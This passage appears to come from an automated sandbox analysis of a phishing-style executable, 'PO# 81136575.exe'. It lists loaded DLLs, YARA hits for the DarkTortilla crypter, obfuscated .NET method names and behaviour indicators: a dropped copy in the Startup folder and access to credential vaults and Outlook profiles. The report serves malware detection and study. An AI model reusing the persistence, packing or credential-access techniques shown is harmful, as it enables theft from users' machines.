                Source: C:\Windows\SysWOW64\clip.exeSection loaded: edgegdi.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: msvcp140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: edgegdi.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\PO# 81136575.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: PO# 81136575.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO# 81136575.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: PO# 81136575.exeStatic file information: File size 1565184 > 1048576
                Source: PO# 81136575.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x16d000
                Source: PO# 81136575.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Drawing.pdb source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000012.00000002.2732638423.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004ECD000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2732328486.0000000004A4F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2735637861.0000000004BF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000012.00000002.2732638423.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000018.00000002.5958166544.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004ECD000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2732328486.0000000004A4F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2735637861.0000000004BF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: clip.pdb source: AddInProcess32.exe, 00000012.00000002.2731816086.0000000000F48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: clip.pdbGCTL source: AddInProcess32.exe, 00000012.00000002.2731816086.0000000000F48000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected DarkTortilla Crypter
                Source: Yara matchFile source: 14.2.sage.exe.407aa5e.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.471a7fe.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.46c15fe.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.sage.exe.402185e.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.5ac0000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.42d5570.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.455be60.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.42d5570.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.455be60.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.5ac0000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.5995803549.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1251917102.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1253880543.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1253880543.000000000467B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.5995803549.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1251917102.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1253880543.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.5966810448.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1253880543.00000000047DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO# 81136575.exe PID: 9020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: sage.exe PID: 4568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: sage.exe PID: 904, type: MEMORYSTR
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: PO# 81136575.exe, Hs8a.cs.Net Code: NewLateBinding.LateCall(rtbLog, (Type)null, "Invoke", new object[1] { (z0W)([SpecialName] () =>{NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionStart", new object[1] { NewLateBinding.LateGet(rtbLog, (Type)null, "TextLength", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionLength", new object[1] { 0 }, (string[])null, (Type[])null);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionColor", new object[1] { r7CF.Value }, (string[])null, (Type[])null);NewLateBinding.LateCall(rtbLog, (Type)null, "AppendText", new object[1] { t4G7 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionColor", new object[1] { NewLateBinding.LateGet(rtbLog, (Type)null, "ForeColor", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                Source: PO# 81136575.exe, Hs8a.cs.Net Code: NewLateBinding.LateCall(rtbLog, (Type)null, "Invoke", new object[1] { (z0W)([SpecialName] () =>{NewLateBinding.LateCall(rtbLog, (Type)null, "AppendText", new object[1] { t4G7 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                Source: sage.exe.4.dr, Hs8a.cs.Net Code: NewLateBinding.LateCall(rtbLog, (Type)null, "Invoke", new object[1] { (z0W)([SpecialName] () =>{NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionStart", new object[1] { NewLateBinding.LateGet(rtbLog, (Type)null, "TextLength", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionLength", new object[1] { 0 }, (string[])null, (Type[])null);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionColor", new object[1] { r7CF.Value }, (string[])null, (Type[])null);NewLateBinding.LateCall(rtbLog, (Type)null, "AppendText", new object[1] { t4G7 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);NewLateBinding.LateSet(rtbLog, (Type)null, "SelectionColor", new object[1] { NewLateBinding.LateGet(rtbLog, (Type)null, "ForeColor", new object[0], (string[])null, (Type[])null, (bool[])null) }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                Source: sage.exe.4.dr, Hs8a.cs.Net Code: NewLateBinding.LateCall(rtbLog, (Type)null, "Invoke", new object[1] { (z0W)([SpecialName] () =>{NewLateBinding.LateCall(rtbLog, (Type)null, "AppendText", new object[1] { t4G7 + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                Source: sages.exe.14.drStatic PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_0313F2B1 push esp; retf 0_2_0313F2B2
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_07274A1F pushad ; retf 0_2_07274A25
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_07274A74 pushfd ; retf 0046h0_2_07274A9A
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_07274AA1 pushfd ; retf 0046h0_2_07274AA2
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072746DC push ss; ret 0_2_0727479E
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_07271408 push ss; ret 0_2_0727479E
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072E7E2F push ecx; retf EFCDh0_2_072E7F9A
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072ED0CC pushad ; ret 0_2_072ED0CD
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_072EC8DC push eax; retf 0_2_072EC8DD
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077B7122 pushad ; ret 0_2_077B7133
                Source: C:\Users\user\Desktop\PO# 81136575.exeCode function: 0_2_077B5C61 push ecx; retf 0046h0_2_077B5C82
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_02A4F2B1 push esp; retf 14_2_02A4F2B2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C07E2F push ecx; retf EFCDh14_2_06C07F9A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C0FBE3 push edi; ret 14_2_06C0FDDE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06C0FDEC push eax; ret 14_2_06C0FE1D
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F11675 push ds; retf 0040h14_2_06F116C6
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6BDF8 pushfd ; iretd 14_2_06F6C3DE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F66684 pushad ; retn 0040h14_2_06F666AE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F687C5 push es; iretd 14_2_06F68846
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6A39F push edx; retn 0040h14_2_06F6A3AE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F688A2 push eax; ret 14_2_06F688A9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F688AA pushfd ; ret 14_2_06F688C1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F6C417 pushfd ; iretd 14_2_06F6C3DE
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_070DAD39 push eax; iretd 14_2_070DAD8E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_070D5C61 push ecx; retf 0046h14_2_070D5C82
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCA478D push eax; ret 14_2_0FCA478E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB25FF push es; ret 14_2_0FCB2637
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB2565 push es; ret 14_2_0FCB2637
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB94C2 push eax; ret 14_2_0FCB94F9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCA4CD3 push esp; retf 14_2_0FCA4CD4
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCAECF2 push E12A8BA8h; retf 14_2_0FCAECF7
                Source: PO# 81136575.exeStatic PE information: section name: .text entropy: 7.089199817727075
                Source: sage.exe.4.drStatic PE information: section name: .text entropy: 7.089199817727075
                Source: 0.2.PO# 81136575.exe.471a7fe.7.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.471a7fe.7.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.471a7fe.7.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.46c15fe.2.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.46c15fe.2.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.46c15fe.2.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.3774b0c.0.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.3774b0c.0.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.3774b0c.0.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.33865a4.1.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.33865a4.1.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.33865a4.1.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.4825dae.3.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.4825dae.3.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.4825dae.3.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: 0.2.PO# 81136575.exe.47739ee.6.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: 0.2.PO# 81136575.exe.47739ee.6.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: 0.2.PO# 81136575.exe.47739ee.6.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                Source: sages.exe.14.dr, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                Source: sages.exe.14.dr, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                Source: sages.exe.14.dr, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
